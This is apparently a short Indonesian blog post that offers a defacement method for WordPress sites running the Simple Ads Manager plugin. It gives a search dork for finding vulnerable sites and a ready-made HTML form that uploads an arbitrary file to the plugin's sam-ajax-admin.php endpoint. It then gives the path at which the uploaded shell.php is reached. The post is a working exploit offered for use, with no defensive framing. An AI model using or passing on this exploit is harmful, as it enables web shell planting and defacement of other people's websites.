Deface Menggunakan Wordpress plugin Simple Ads Manager - Arbitrary File Upload
#Author : Tu5b0l3d
# Date : 05/04/2015
#Dork: inurl:/wp-content/plugins/simple-ads-manager/
# CSRF: simpan dengan file.html
<form enctype="multipart/form-data"
action="http://target.com/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php" method="post">
<input type="text" name="path"><input name="uploadfile" type="file" />
<input name="action" type="hidden" value="upload_ad_image">
<input type="submit" value="upload">
</form>
# sumber: 1337day
Shell akses : http://site.com/wp-content/plugins//simple-ads-manager/shell.php
semoha bermanfaat
Post a Comment